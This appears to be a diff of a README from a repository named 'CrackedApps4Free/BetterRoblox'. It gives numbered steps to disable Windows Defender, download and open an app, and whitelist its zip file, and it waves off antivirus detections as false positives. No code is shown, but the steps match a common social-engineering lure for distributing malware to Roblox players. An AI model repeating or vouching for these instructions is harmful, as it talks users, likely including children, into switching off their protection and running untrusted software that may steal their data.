CrackedApps4Free/BetterRoblox/README.md

 Steps:

-Disable Windows Defender.
+1 Disable Windows Defender.

-Download the app.
+2 Download the app.

-Open the app.
+3 Open the app.

-And you're done!
+4 And you're done!
 Give it a try and enjoy an elevated Roblox experience!

-By the way, remember to disable Windows Defender when using it, as it may falsely detect it as a virus.
+5 By the way, remember to disable Windows Defender when using it, as it may falsely detect it as a virus. also whitelist the zip file on windows defender as you may get errors.